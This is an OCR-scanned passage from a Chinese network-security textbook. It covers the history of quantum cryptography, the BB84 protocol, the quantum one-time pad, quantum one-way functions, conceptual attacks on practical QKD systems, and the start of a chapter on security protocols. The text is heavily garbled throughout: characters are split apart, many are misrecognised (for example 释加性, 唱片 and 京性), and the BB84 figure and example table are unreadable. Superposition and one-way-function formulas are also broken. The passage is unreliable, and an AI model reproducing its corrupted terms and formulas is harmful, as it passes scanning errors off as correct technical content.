32cm, 但 为 今后 量子 信息 科学 的 发 展 起 到 了 举足轻重 的 作用 。1991 年 ,牛津 大 学 科学 家 A. 
Ekert 提出 了 利用 EPR 纠缠 对 来 实现 的 量子 密 钥 分 发 协议 。1992 年 ,Bennett 又 提出 了 一 
种 方案 , 现 称 之 为 B92 协议 。 相 对 于 BB84 协议 而 言 ,这 种 方案 更 为 简单 ,但 是 效率 只 有 
BB84 协议 的 一 半 。1993 年 ,英国 国防 研究 部 首先 在 光纤 中 实现 了 基于 BB84 方案 的 量子 密 
钥 分 发 ,光纤 传输 长 度 为 10 公里 。 这 项 研究 后 来 转 到 英国 通讯 实验 室 进行 ,到 1995 年 ,经 
多 方 改进 ,在 30 公里 长 的 光纤 传输 中 成 功 实现 了 量子 密 钥 分 发 。1993 年 ,瑞士 日 内 瓦 大 学 
基于 BB84 方案 的 偏振 编码 方案 ,在 1.1km 长 的 光纤 中 传输 1. 3pm 波长 的 光子 , 误 码 率 仅 
为 0.54%, 并 于 1995 年 在 日 内 瓦 湖底 铺设 的 23 公里 民用 光 通 信 光 缆 中 进行 了 实地 表演 ， 
误 码 率 为 3. 4%。1993 年 ,Bennett 等 6 位 不 同 国家 的 科学 家 发 表 了 一 篇 开创 性 的 论文 , 提 
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秦 于 案例 的 网 络 安全 鞭 术 与 实践 


传递 光子 
Alice 和 Bob 分 别 得 
A 
筛选 相同 测量 
基 的 测量 结果 
Alice 和 Bob 分 别 得 通信 系统 的 各 类 参数 
到 N 个 测量 结果 -人 
ee 错误 概率 估计 一 
错误 估计 后 的 预计 
得 到 n 个 比特 _= 精确 的 错误 率 估 计 安全 性 要 求 
7 个 比特 关中 (随机 抽样 定理 ) 安全 性 要 求 
、( 信 息 调和 ) | 计算 在 错误 估计 阶段 
汽 露 了 多 少 信息 量 
1 
错误 纠 下 后 得 到 jn 综合 考量 
个 比特 
得 出 需要 抛弃 的 测量 
结果 一 一 z 个 比特 
保密 增强 
可 由 共享 的 认证 
n-t 个 密 钥 比 例 
» 
| 事先 共享 的 认证 密 钥 | 
! | 
1 1 
! 认证 | 
1 | 
~ 2 
最 终 安全 的 oz 个 密 钥 比例 
图 5.5 BB84 量子 密 钥 分 配 的 过 程 
表 5.4 BB84 一 个 实例 
A 发 送 人 一 下 只 7 K ™ 一 
B 选 基 四 四 四 四 @ 四 (3 © 
B 测 量 沁 一 个 = \ 
比 对 一 
生成 密 钥 0 1 0 


出 了 利用 经 典 与 量子 相 结合 的 


1997 年 ,奥地利 Innsbruck 大 学 


的 大 数 因 式 分 解 量子 算法 一 - 


方法 来 实现 量子 隐形 传 态 (Quantum Teleportation ) 的 方案 。 
实验 物理 研究 所 的 一 个 研究 组 成 功 进行 了 “量子 隐形 传 态 ” 
实验 。1994 年 ,美国 AT&T 计算 机 科学 家 P. Shor 利用 量子 释 加 性 和 纠缠 态 提 出 了 著名 
Shor 算法 ,显示 了 量子 计算 的 效率 可 以 远 远 超 过 经 典 计 算 。 
1995 年 ,L. K. Grover 提出 了 量子 搜索 算法 。 这 两 种 量子 算法 表明 ,采用 量子 计算 可 以 轻 而 
易 举 地 破译 各 种 传统 的 基于 数学 计算 复杂 度 的 密码 体系 。 也 就 是 说 ,一 旦 量子 计算 领域 获 


得 重大 突破 , 它 所 具有 的 特殊 性 能 ,将 使 经 典 的 密码 体系 彻底 地 “无 密 可 保 ”。 


近 几 年 ,量子 信息 科学 已 然 成 为 世界 的 研究 热点 。2009 年 1 月 ,NIST 公布 了 一 个 报告 
“量子 信息 科学 联邦 版 本 ”。 报 告 提出 “美国 创造 了 控制 .操纵 量子 事态 的 科学 基础 ,为 了 构 
造 21 世纪 技术 知识 基础 ,证 明了 物理 、 数 学 .计算 能 力 和 量子 信息 处 理 系 统 的 限制 ”。 从 专 
家 组 提出 的 研究 热点 抽象 出 23 个 封闭 的 量子 信息 科学 不 同 的 方向 。 

英国 布 里 斯 托 尔 大 学 等 机 构 的 研究 人 员 在 2010 年 第 九 期 美国 4 科学》 杂志 上 报告 了 量 
子 计算 机 研究 领域 的 新 进展 。 领 导 研 究 的 杰 里 米 。 奥 布 赖 因 教授 认为 ,这 一 进展 可 能 使 量 
子 计算 机 面世 的 时 间 提 前 到 10 年 之 内 : 奥 布 赖 恩 教 授 说 ,从 单 光子 到 双 光 子 是 一 个 巨大 的 
跨越 ,每 添加 一 个 光子 ,量子 计算 机 可 解决 问题 的 复杂 程度 是 成 指数 增加 的 ,比方 说 单 光子 
的 量子 游 走 可 以 带 来 10 个 结果 ,那么 双 光 子 的 量子 游 走 将 可 以 带 来 100 种 结果 。 他 说 : 
“许多 人 认为 量子 计算 机 至 少 要 再 等 25 年 才 会 出 现 , 但 我 们 相信 ,在 使 用 这 种 新 技术 之 后 ， 
10 年 内 就 可 能 出 现 超越 传统 计算 机 的 量子 计算 机 .” 事 实 上 ,2011 年 5 月 23 日 ,加 拿 大 量子 
计算 公司 D-Wave 正式 发 布 了 全 球 第 一 款 商 用 型 量子 计算 机 “D-Wave One”, 量 子 计 算 机 的 
梦想 距离 我 们 又 近 了 一 大 步 。 到 2020 年 ,计算 机 从 速度 到 硬件 不 得 不 “被 量子 ”。 以 未 来 互 
联网 的 角度 、 以 量子 信息 的 角度 ,量子 替代 电子 从 硬件 到 软件 都 做 好 了 充分 的 准备 。 


5.4.2 量子 密码 与 传统 密码 的 异同 点 


研究 的 两 种 不 同 观点 。 一 种 观点 是 在 设计 量子 签名 协议 时 ,应 该 充分 利用 量子 性 质 来 
解决 问题 ,以 达到 无 条 件 安全 ,如 果 再 把 基于 经 典 密码 的 计算 难题 引入 到 量子 数字 签名 协议 
中 来 ,这 就 失去 了 本 来 意义 , 另 一 种 观点 是 : 由 于 达到 完善 保密 限制 过 高 ,目前 需要 一 种 结 
合 传统 计算 密码 和 量子 密码 的 方案 ,达到 逐步 过 渡 ,这 种 观点 的 研究 者 把 许多 传统 计算 密码 
中 的 思想 和 工具 都 用 到 量子 密码 中 ,如 量子 随机 预言 模型 等 。 

量子 密 钥 分 配 分 成 两 个 大 类 : 一 类 是 制备 测量 协议 (Prenare and Measure Protocols)， 
包括 BB84、B92 等 , 它 的 安全 性 是 基于 量子 力学 3 个 基本 定律 ; 而 另 一 类 是 基于 纠缠 的 协 
议 (Entanglement-Based Protocols), 它 的 安全 性 由 量子 比特 的 纠缠 性 直接 保证 ,如 BBM 
协议 。 

5.4.3 量子 一 次 一 窗 

量子 一 次 一 密 是 经 典 的 一 次 一 密 在 量子 密码 中 的 应 用 。 量 子 一 次 一 密 和 经 典 的 一 次 一 
密 一 样 , 密 钥 的 比特 位 数 和 被 加 密 信息 的 比特 位 数 相 同 。 通 信和 双方 首先 用 量子 密 钥 分 发 协 
议 分 配 密 钥 ,然后 加 密 ,根据 密 钥 对 要 加 密 的 消息 采取 相应 的 么 正 操作 。 例 如 M 个 么 正 操 
作 的 集合 {Ui} ,其 中 = 二 1,…,M, 每 个 元 素 Ui 为 么 正和 矩阵 , 密 钥 选择 的 概率 为 pi ,那么 可 
以 运用 相应 的 么 正 操作 Ux 对 输入 量子 态 进 行 加 密 . 解 密 时 则 对 加 密 态 运用 么 正 操作 UA 得 
到 原始 消息 态 , 输 出 量子 态 pc 为 加 密 态 ,那么 可 得 到 加 密 输 出 的 混合 态 pc = PA 
举例 说 明 : 密 钥 和 被 加 密 信息 的 位 数 均 为 n, 如 果 密 钥 第 i 位 为 0, 加 密 方 不 对 消息 态 做 任何 
操作 ; 如 果 密 钥 第 i 位 为 1, 则 对 消息 态 相 应 的 量子 位 执行 oz 操作 ,这 样 就 对 个 量子 位 的 
消息 进行 了 加 密 。 类 似 还 可 以 设计 出 其 他 的 量子 一 次 一 密 算法 。 


5.4.4 量子 单 向 函数 
为 了 避免 使 计算 密码 中 广泛 应 用 的 各 类 陷 门 单 向 函数 如 RSA 函数 在 后 量子 时 代 单 向 
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性 消失 ,人 们 构造 了 3 类 量子 单 向 函数 。 

第 一 类 量子 单 向 函数 是 指 在 “量子 计算 机 存在 而 且 不 能 求解 NP 完全 问题 "假设 下 具有 
单 向 性 的 经 典 函数 ,并 基于 此 研究 了 后 量子 时 代 的 各 类 密码 学 问题 。 

第 二 类 量子 单 向 函数 是 作用 在 量子 态 上 的 诱导 量子 单 向 函数 。 它 由 经 典 单 向 函数 诱导 
生成 ,是 计算 安全 的 。 可 以 证 明 , 只 有 基于 陷 门 单 向 函数 才能 诱导 出 此 类 量子 单 向 函数 ,不 
过 陷 门 从 此 消失 。 所 以 在 量子 态 上 的 单 向 函数 怎样 构造 陷 门 就 是 一 个 问题 。2003 年 杨 理 
等 基于 McEliece 公 钥 密码 体制 构造 出 第 一 个 作用 在 量子 态 上 的 陷 门 单 向 函数 和 公 钥 加 密 
算法 ,并 构造 了 量子 态 上 的 消息 认证 算法 。 

第 三 类 量子 单 向 函数 是 把 经 典 序列 随机 映射 到 某 一 量子 态 上 去 。 此 类 函数 用 于 承诺 协 
议 时 具有 信息 论 安全 的 隐藏 性 ( 即 单 向 性 ) ,但 由 于 EPR 攻击 的 存在 ,不 具有 计算 无 关 的 绑 
定性 ( 即 量子 比特 承诺 的 no-go 定理 )。2006 年 基于 这 种 映射 杨 理 和 李 宝 构造 了 具有 双向 
物理 安全 性 的 量子 比特 承诺 协议 ,目前 已 证 明 这 一 类 量子 比特 承诺 协议 的 安全 性 确实 超越 
了 经 典 比特 承诺 协议 安全 性 的 理论 极限 。 

实例 : 经 典 的 量子 单 向 函数 为 映射 FGi) : I>O。 即 对 于 任意 输入 i ET, 容 易 计算 ,而 对 
于 几乎 所 有 的 iE 工 求 逆 困难 。Gottesman 基于 经 典 的 单 向 函数 ,提出 了 量子 单 向 函数 的 概 
念 : 即 输入 长 度 为 工 的 经 典 比特 串 , 输 出 个 量子 位 的 量子 态 | fi) ,其 中 工 ))n, 映 射 k 一 
|fi) 易 于 计算 ,但 已 知 |f) 求 道 困难 。 量 子 信 息 理论 一 个 基本 定理 一 一 Holevo 定理 是 求 逆 
困难 的 依据 。Holevo 定理 限制 了 从 量子 态 |f) 中 获取 经 典 信息 的 数量 ,对 n 个 量子 比特 的 
测量 至 多 能 得 到 个 经 典 比特 的 信息 ,由 于 工 ， ,根据 | 户 ? 成 功 猜测 & 的 机 会 非常 小 ,所 以 
映射 一 | fi) 可 视 为 一 种 量子 单 向 函数 。 


5.4.5 量子 密码 安全 性 挑战 


对 于 量子 密 钥 分 配 系统 ,所 有 的 安全 性 证 明 都 不 是 绝对 的 。 在 证 明 的 时 候 或 多 或 少 地 
都 自 定义 了 一 些 假设 ,并 以 此 为 基础 来 进行 证 明 。 但 是 对 于 实际 量子 密 钥 分 发 系统 ,由 于 不 
完美 器 件 的 使 用 ,这 些 缺 陷 就 可 以 成 为 对 实际 系统 攻击 的 出 发 点 。 

1. 光子 数 分 离 攻击 (Photon number Splitting attack) 

因为 缺少 实际 可 用 的 标准 单 光子 源 ,通常 系统 中 使 用 弱 相 干 光 或 参量 下 转换 光源 来 进 
行 代替 。 但 是 其 光子 数 态 分 布 ,前 者 是 泊 松 分 布 , 后 者 是 热 分 布 , 均 存在 着 多 光子 脉冲 的 概 
率 。 对 于 这 部 分 脉冲 ,窃听 者 Eve 可 以 采用 PNS 攻击 来 获取 信息 量 。Eve 进行 这 种 攻击 有 
3 个 前 提 条 件 : 首先 , 它 能 建立 任意 长 度 的 衰减 为 零 的 透明 信道 ,来 补偿 自己 的 操作 带 来 的 
光 强 衰减 ; 其 次 ,她 能 够 进行 量子 非 破 坏 性 测量 , 即 她 能 够 分 辨 出 脉冲 信号 中 的 光子 数 而 不 
会 影响 到 量子 态 本 身 ; 最 后 ,她 需要 拥有 量子 存储 ,以 方便 自己 把 分 离 的 信号 进行 保存 , 直 
至 掌握 到 Alice 和 Bob 之 间 的 公开 对 基 信 息 后 再 进行 测量 。 

2. 时 移 攻击 (Time-shift attack) 

在 普通 的 BB84 方案 中 ,为 了 提高 系统 效率 和 密 钥 生 成 率 ,会 使 用 两 个 盖 革 模式 (Geiger 
mode) 的 阔 值 单 光 子 探测 器 ,选择 不 同 基 进 行 测量 。 理 论 上 Eve 无 法 区 分 这 两 台 探测 器 ,不 
会 引入 安全 性 漏洞 。 然 而 在 实际 中 由 于 响应 以 及 电子 线路 等 各 种 因素 ,两 台 探测 器 是 无 法 
保证 完全 一 致 。 这 就 意味 着 Eve 有 机 会 能 区 分 探测 器 。 通 过 在 公开 信道 里 的 操作 ,Eve 能 
实现 对 Bob 测量 结果 的 改变 ,实施 伪装 态 攻 击 (Fake state attack) ,从 而 获取 一 定 的 信息 量 。 


实际 阔 值 探测 器 能 被 攻击 的 自由 度 很 多 ,量子 效率 .响应 波长 .脉冲 的 偏振 ,都 可 以 被 Eve 
利用 来 进行 攻击 。 目 前 在 实际 中 操作 的 攻击 是 基于 探测 器 的 测量 效率 时 间 曲 线 不 完全 重 
释 。Eve 不 作 任 何 的 测量 ,只 是 改变 脉冲 到 达 Bob 端的 时 间 ,来 获取 信息 。 

3. 特洛伊 木马 攻击 (Trojan-horse attack) 

量子 密码 的 安全 性 证 明 中 规定 了 Alice 和 Bob 均 拥有 自己 的 安全 区 。 然 而 由 于 光学 部 
分 器 件 的 影响 ,实际 系统 安全 区 是 无 法 实现 ,Eve 总 可 以 探知 到 双方 实验 室内 的 部 分 信息 。 
一 种 攻击 手段 是 Eve 用 强 光 入 射 到 Alice 或 Bob 端 ,并 利用 OTDL 来 测量 干涉 环 各 个 器 件 
端面 的 反射 光 强 度 , 通 过 观察 相位 调制 器 的 反射 光 强 度 来 获知 当前 的 调制 相位 。 等 待 Alice 
和 Bob 对 基 后 ,Eve 可 以 完全 获取 密 钥 。 一 般 来 说 ,这 种 攻击 对 于 双向 量子 密 钥 分 配 系 统 很 
有 效 ,而 单 向 量子 密 钥 传输 可 以 在 实验 室 的 出 口 位 置 通过 高 隔离 度 的 光环 形 器 来 控制 实验 
室 和 外 界 的 连接 ,抵御 木马 攻击 。 

以 上 这 些 都 是 针对 实际 量子 密码 系统 中 可 能 存在 的 安全 性 漏洞 设计 的 攻击 策略 。 由 此 
可 见 ,实际 系统 的 复杂 度 远 远 超出 了 协议 的 理论 方案 。 只 有 不 断 地 对 实际 系统 进行 研究 , 完 
善 其 理论 模型 使 之 与 实际 情况 更 接近 ,才能 为 量子 密码 系统 的 实用 化 提供 坚实 的 理论 保障 。 


5.5 小 结 


电子 计算 机 的 产生 ,使 得 密码 学 从 机 械 时 代 发 展 到 了 计算 机 时 代 。 计 算 机 的 计算 能 力 

影响 着 密码 系统 的 设计 者 ,也 影响 了 密码 系统 的 攻击 者 。 

电子 计算 机 的 计算 能 力 存在 瓶颈 。 根 据 摩 尔 定律 ,在 一 块 固定 面积 的 芯片 上 ,被 集成 的 
晶片 的 数量 以 一 到 两 年 的 时 间 增 加 一 倍 。 问 题 是 芯片 的 密度 受到 一 定 的 物理 限制 ,这 样 限 
制 了 唱片 的 数量 ,连带 也 限制 了 电子 计算 机 的 计算 速度 。 当 芯片 密度 越 来 越 大 ,唱片 之 间 的 
距离 以 纳米 为 单位 来 计算 的 话 , 就 会 出 现 量子 效应 。 这 样 ,量子 计算 机 就 诞生 了 1! 

计算 密码 研究 的 ,很 大 的 一 部 分 是 在 加 长 密 钥 位 数 , 或 者 多 次 加 密 方面 。 但 是 香农 的 完 
全 加 密 理论 指出 : 一 个 加 密 系 统 要 达到 完全 加 密 的 要 求 , 密 钥 的 长 度 要 与 明文 的 长 度 一 样 
长 。 这 是 不 现实 的 ! 即便 是 公 钥 密码 体制 ,由 于 密 钥 安 全 是 基于 大 数 分 解 的 , 随 着 计算 能 力 
的 快速 发 展 ,也 会 变 得 很 不 安全 。 

量子 的 特性 如 下 : 

(1) 传统 意义 上 ,任何 粒子 都 处 在 一 个 明确 的 状态 ,是 否 测量 都 不 会 改变 状态 。 

(2) 量子 力学 : 量子 同时 处 在 不 同 的 状态 ,只 是 这 些 状态 各 自 有 不 同 的 发 生 概率 (量子 
释 加 性 ) ,但 是 一 旦 被 测量 ,状态 就 被 确定 (量子 态 的 韧 缩 ) 。 

(3) 利用 量子 作出 的 单一 位 元 ,就 称 为 量子 位 元 (Quantum Bit,Qubit) 。 

(4) 量子 位 元 与 传统 位 元 的 比较 : 传统 位 元 : 任 一 时 刻 , 非 0 即 1, 确 定 的; 量子 位 元 : 
10》、|1> .el|0? 十 8|1>( 超 位 置 SuperPosition) ,其 中 |w|? 十 18| 三 1。 一 旦 测量 |c|? 和 |B|?， 
也 是 确定 的 , 非 0 即 1, 存 在 一 个 发 生 概率 。 

(5) 真正 的 随机 性 : 店 I+ 雇 I ,各 自 有 1/2 的 概率 为 状态 10> 和 |1>。 所 以 量子 计 
算 机 可 以 生成 传统 电子 计算 机 头疼 的 真正 随机 数 。 

(6) 7 个 量子 位 元 ,可 以 产生 2" 个 所 有 可 能 组 合 (” 位 二 进 制 数 )。 量 子 计 算 机 的 处 理 器 
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有 个 量子 位 元 ,那么 同一 时 间 执 行 一 次 运算 ,就 可 以 同时 对 所 有 2 个 不 同 状态 作 运算 。 
而 传统 的 电子 计算 机 一 次 只 能 处 理 一 个 状态 。 按 理论 估算 ,一 个 有 5000 个 量子 位 元 的 量子 
计算 机 ,用 30s 就 可 以 解决 相同 位 元 的 大 数 的 因 式 分 解 问题 ,而 传统 的 计算 机 需要 100 亿 年 
(地 球 的 年 龄 是 46 亿 年 ,太阳 还 有 50 亿 年 寿命 ,产生 智能 只 要 46 亿 年 !)。 


5.6 习 题 


1. 简 述 物理 密码 与 计算 密码 区 别 。 

2. 量子 密码 基于 量子 的 两 个 物理 京 性 是 什么 ? 

3. 量子 计算 对 现 有 密码 进行 攻击 的 方法 主要 有 哪 3 种 ? 
4. 抗 量子 密码 技术 主要 包括 哪 几 类 ? 


* 
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第 6 章 安全 协议 概述 


安全 协议 是 网 络 安全 体系 的 操作 系统 。 
一 一 网 络 名 言 


6.1 安全 协议 的 基本 概念 


信息 安全 是 一 个 没有 尽头 的 任务 ,信息 社会 存在 一 天 ,信息 安全 就 会 存在 一 天 。 攻 防 共 
生 共 存 , 魔 高 一 尺 , 道 高 一 丈 ,反之 亦 然 。 完 美的 理论 ,并 不 一 定 能 够 解决 信息 安全 的 实际 问 
题 , 理 论 到 实践 是 一 个 系统 工程 ,而 安全 协议 的 模型 与 设计 是 这 个 工程 的 核心 ,是 承载 信息 
安全 体系 的 脊梁 ,是 应 用 选择 理论 的 载体 : 设计 安全 协议 不 单单 是 基于 技术 本 身 ,也 要 考虑 
应 用 的 成 本 、 代 价 和 体验 。 


6.1.1 游戏 规则 的 建立 


所 谓 协议 (Protocol) ,就 是 两 个 或 两 个 以 上 的 参与 者 为 完成 某 项 特定 的 任务 而 采取 的 
一 系列 步骤 。 这 包含 3 层 含义 : 第 一 ,协议 自始至终 是 有 序 的 过 程 ,每 一 个 步骤 必须 依次 执 
行 。 在 前 一 步 没 有 执行 完 之 前 ,后 面 的 步骤 不 可 能 执行 。 第 二 ,协议 至 少 需要 两 个 参与 者 。 
一 个 人 可 以 通过 执行 一 系列 的 步骤 来 完成 某 项 任务 ,但 它 不 构成 协议 。 第 三 ,通过 执行 协议 
必须 能 够 完成 某 项 任务 。 

协议 还 有 其 他 特点 : 

(1) 协议 中 的 每 人 都 必须 了 解 协议 ,并 且 预 先知 道 所 要 完成 的 所 有 步 又 。 

(2) 协议 中 的 每 人 都 必须 同意 遵循 它 。 

(3) 协议 必须 是 不 模糊 的 ,每 一 步 必须 明确 定义 ,并 且 不 会 引起 误解 。 

(4) 协议 必须 是 完整 的 ,对 每 种 可 能 的 情况 必须 规定 具体 的 动作 。 

安全 协议 (Security Protocol) 是 建立 在 某 种 体系 (密码 体制 .量子 京 性 ) 基 础 上 且 提 供 安 
全 服务 的 一 种 交互 通信 的 协议 , 它 运行 在 计算 机 通信 网 络 或 分 布 式 系统 中 ,借助 于 特定 算法 
来 达到 密 钥 分 配 、 身 份 认 证 等 目的 。 安 全 协议 的 密码 基础 是 由 3 类 基石 构造 的 ,如 图 6. 1 
所 示 。 

安全 协议 的 通信 系统 基本 安全 模型 如 图 6.2 所 示 。 

安全 协议 的 参与 者 可 能 是 可 以 信任 的 实体 ,也 可 能 是 攻击 者 和 完全 不 信任 的 实体 。 安 
全 协议 的 目标 不 仅仅 是 实现 信息 的 加 密 传 输 , 参 与 协议 的 各 方 可 能 希望 通过 分 享 部 分 秘密 
来 计算 某 个 值 . 生 成 某 个 随机 序列 、 向 对 方 表明 自己 的 身份 或 签订 某 个 合同 等 。 解 决 这 些 安 
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图 6.2 通信 系统 的 安全 模型 


全 问题 就 需要 在 协议 中 采用 密码 技术 ,因为 它们 是 防止 或 检测 非法 用 户 对 网 络 进行 窃听 和 
欺骗 攻击 的 关键 技术 措施 。 对 于 采用 了 这 些 技术 的 安全 协议 来 说 ,如 果 非 法 用 户 不 可 能 从 
协议 中 获得 比 协议 自身 所 体现 的 更 多 的 有 用 的 信息 ,那么 就 可 以 说 协议 是 安全 的 。 安 全 协 
议 中 采用 了 多 种 不 同 的 密码 体制 ,其 层次 结构 如 表 6. 1 所 示 。 

表 6.1 安全 协议 层次 结构 


层 次 计算 密码 量子 密码 

高 级 协议 ” 身份 认证 ,不 可 否认 、 群 签名 量子 密 钥 分 发 .博弈 量子 密 钥 协商 
基本 协议 ”数字 签名 、 零 知识 ,秘密 共享 量子 签名 

基本 算法 ” 对称 加 密 、 非 对 称 加 密 、Hash 函数 量子 Hash 函数 

理论 基础 ”核心 断言 .数论 ,抽象 代数 、 数 学 难题 不 可 克隆 、 真 随机 性 、 数 学 难题 


从 表 6. 1 可 看 出 ,安全 协议 建构 在 数学 或 量子 信息 科学 基础 和 基本 算法 之 上 ,并 且 往往 
涉及 秘密 共享 加密、 签名 、 承 诺 、 零 知识 证 明 等 许多 基础 协议 ,因此 安全 协议 的 设计 比较 庞 
大 而 复杂 ,设计 满足 各 种 安全 性 质 的 安全 协议 成 为 一 项 具有 挑战 性 的 研究 工作 。 当 前 存在 
着 大 量 的 实现 不 同安 全 服务 的 安全 协议 ,其 中 最 常用 的 基本 安全 协议 按照 其 完成 的 功能 可 
分 类 起 名 ,如 电子 支付 协议 、 分 布 式 环境 下 的 身份 鉴别 协议 .不 可 否认 协议 、 密 钥 协 商 协 
6.1.2 游戏 规则 的 目的 

在 日 常生 活 中 ,几乎 所 有 的 事情 都 有 非 正式 的 协议 : 电话 订货 、 玩 扑克 、 选 举 中 投票 ,人 


们 都 知道 怎样 使 用 它们 ,而 且 它 们 也 很 有 效 。 随 着 信息 技术 的 高 速 发 展 ,将 这 些 现实 的 协议 
功能 转化 为 数字 ,从 而 在 计算 机 世界 中 实现 是 很 顺理成章 的 事情 。 越 来 越 多 的 人 通过 计算 
机 网 络 交流 代替 面对面 的 交流 ,计算 机 需要 正式 的 协议 来 完成 人 们 不 用 考虑 就 能 做 的 事情 ， 
虽然 方便 大 众 , 但 也 不 是 很 容易 就 实现 的 : 如 果 你 从 一 个 城市 迁移 到 另 一 个 城市 ,可 能 会 发 
现 投票 亭 与 你 以 前 使 用 的 完全 不 同 , 你 会 很 容易 去 适应 它 ,但 计算 机 就 不 那么 灵活 了 。 

许多 面对面 的 协议 依靠 人 的 现场 存在 来 保证 公平 和 安全 。 你 会 交 给 陌生 人 一 番 现 金 去 
为 你 买 食品 吗 ? 如 果 你 没有 看 到 他 洗 牌 和 发 牌 ,你 愿意 和 他 玩 扑 克 吗 ? 如果 没 有 匿名 的 保 
证 ,你 会 将 秘密 投票 寄 给 政府 吗 ? 

那 种 假设 使 用 计算 机 网 络 的 人 都 是 诚实 的 想法 ,是 天 真 的 。 天 真 的 想法 还 有 : 假设 计 
算 机 网 络 的 管理 员 是 诚实 的 ,假设 计算 机 网 络 的 设计 者 是 诚实 的 。 当 然 , 绝 大 多 数 人 是 诚实 
的 ,但 是 不 诚实 的 少数 人 可 能 招致 很 多 损害 。 通 过 规定 协议 ,可 以 查 出 不 诚实 者 企图 欺骗 的 
把 戏 , 还 可 开发 挫败 这 些 欺骗 者 的 协议 。 

除了 规定 协议 的 行为 外 ,协议 还 根据 完成 某 一 任务 的 机 理 , 抽 象 出 完成 此 任务 的 过 程 。 
由 于 基本 底层 通信 协议 是 相同 的 ,对 于 高 层 的 安全 协议 是 一 个 黑 盒子 ,所 以 我 们 专注 设计 协 
议 流程 与 分 析 , 而 不 用 受 限 于 具体 的 实现 上 。 


6.1.3 游戏 角色 


为 了 帮助 说 明 协 议 ,通常 选 出 几 个 人 作为 助手 : Alice 和 Bob 是 开始 的 两 个 人 。 他 们 将 
完成 所 有 的 两 人 协议 。 按 规定 ,由 Alice 发 起 所 有 协议 ,Bob 响应 。 如 果 协 议 需 要 第 三 或 第 
四 人 ,Carol 和 Dave 将 扮演 这 些 角色 。 由 其 他 人 扮演 的 专门 配角 ,参见 表 6. 2。 


表 6.2 剧 中 人 
Alice 所 有 协议 中 的 第 一 个 参加 者 
Bob 所 有 协议 中 的 第 二 个 参加 者 
Carol 在 三 、 四 方 协议 中 的 参加 者 
Dave 在 四 方 协议 中 的 参加 者 
Eve 窃听 者 
Mallory 恶意 的 主动 攻击 者 
Trent 值得 信赖 的 仲裁 者 
Walter 监察 人 : 在 某 些 协 议 中 保护 Alice 和 Bob 
Peggy 证 明 人 
Victor 验证 者 


6.2 安全 协议 的 分 类 
6.2.1 按照 游戏 角色 的 数量 进行 分 类 


根据 两 点 特质 一 一 认证 和 密 钥 交换 首先 将 协议 分 为 3 大 基本 类 ,再 按照 参与 方 数量 分 
为 两 方 安全 协议 和 多 方 安全 协议 两 大 类 .如 表 6. 3 一 表 6.5 所 示 。 
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表 6.3 基本 安全 协议 


协议 名 称 协议 描述 
认证 协议 提供 给 一 个 参与 方 关于 其 通信 对 方 身份 的 一 定 确信 和 度 
密 钥 交换 协议 在 参与 协议 的 两 个 或 者 多 个 实体 之 间 建 立 共 享 的 秘密 


认证 及 密 钥 交换 协议 为 身份 已 经 被 确认 的 参与 方 建立 一 个 共享 秘密 


表 6.4 两 方 安全 协议 


协议 名 称 协议 描述 

零 知 识 协议 ”是 指 一 个 参与 方 希望 男 一 个 参与 方 相信 某 种 声称 的 正确 性 ,同时 不 泄露 任何 额外 的 信息 

承诺 协议 是 产生 保密 的 承诺 和 公开 秘密 ( 解 诺 ) 的 安全 协议 

撕 币 协议 是 指 两 个 参与 方 试图 协商 一 位 或 多 位 比特 信息 ,即使 某 个 参与 方 试图 使 输出 趋 近 于 某 一 
个 值 时 ,该 比特 信息 仍然 能 够 来 自 于 一 个 均匀 分 布 

不 经 意 传输 。” 指 某 个 参与 方 传送 两 个 消息 , 另 一 个 参与 方 提供 一 个 比特 信息 ,协议 结束 后 消息 的 提供 
者 不 知道 接受 者 获得 了 哪个 消息 ,消息 的 接受 者 不 知道 另 一 个 消息 的 内 容 

可 否认 认证 ”能 够 使 接收 者 鉴别 消息 的 来 源 , 但 是 ,接收 者 不 能 向 第 三 方 证 明 消 息 来 源 , 接 收 者 通过 
“仿真 ”发 送 者 和 接收 者 之 间 的 消息 实现 可 否认 认证 。 签 名 认证 机 制 不 具有 可 否认 性 


表 6.5 多 方 安全 协议 


协议 名 称 协议 描述 

基本 多 方 协议 。 如 秘密 共享 、 可 验证 秘密 共享 、 匿 名 处 理 ,多 方 Ping-Pong 协议 等 

电子 选举 根据 各 种 上 下 文 来 综合 考虑 协议 的 正确 性 、 公 正 性 ,私密 性 和 可 否认 性 

电子 商务 解决 传输 过 程 中 的 公平 性 以 及 某 种 可 接受 的 方式 来 处 理 争 议 ,还 包括 结果 的 公平 
发 布 

数据 库 交 叉 查 询 ”多 个 数据 库 可 以 联合 起 来 进行 数据 查询 。 除 查询 的 结果 之 外 ,数据 库 中 的 其 他 数据 
将 保持 私有 状态 

匿名 信任 系统 ”参与 者 匿名 多 身份 问题 

路 由 协议 安全 路 由 协议 是 一 类 特殊 的 安全 多 方 计算 协议 


6.2.2 按照 是 否 有 仲裁 方 进行 分 类 


根据 可 信 第 三 方 参与 协议 与 否 可 以 将 安全 协议 分 为 3 类 : 仲裁 协议 .裁决 协议 和 自动 
执行 的 协议 。3 种 协议 的 结构 类 型 如 图 6. 3 所 示 。 

1. 仲裁 协议 

仲裁 者 是 在 完成 协议 的 过 程 中 ,值得 信任 的 公正 的 第 三 方 (参见 图 6.3 中 的 (1))， 
“公正 ?意味 着 仲裁 者 在 协议 中 没有 既得 利益 ,对 参与 协议 的 任何 人 也 没有 特别 的 利害 关 
系 。“ 值 得 信任 ?表示 协议 中 的 所 有 人 都 接受 这 一 事实 , 即 仲裁 者 说 的 都 是 真实 的 ,他 做 
的 是 正确 的 ,并 且 他 将 完成 协议 中 涉及 他 的 部 分 。 仲 裁 者 能 帮助 互 不 信任 的 双方 完成 
协议 。 

在 现实 社会 中 ,律师 经 常 作 为 仲裁 者 ,实例 : Alice 要 卖 汽车 给 不 认识 的 Bob。Bob 想 用 
支票 付 账 , 但 Alice 不 知道 支票 的 真 假 。 在 Alice 将 车 子 转 给 Bob 前 ,她 必须 查 清 支票 的 真 


> 


伪 。 同 样 ,Bob 也 并 不 相信 Alice, 就 像 Alice 不 相信 Bob 一 样 , 在 没有 获得 所 有 权 前 ,也 不 
愿 将 支票 交 与 Alice。 这 时 就 需要 双方 都 信任 的 律师 。 在 律师 的 帮助 下 ,Alice 和 Bob 能 够 


用 下 面 的 协议 保证 互 不 欺骗: 

(1) Alice 将 车 的 所 有 权 交 给 律师 。 

(2) Bob 将 支票 交 给 Alice。 

(3) Alice 在 银行 竞 现 支票 。 

(4) 在 等 到 支票 鉴别 无 误 能 够 兑现 的 时 
间 之 后 ,律师 将 车 的 所 有 权 交 给 Bob。 如 果 在 
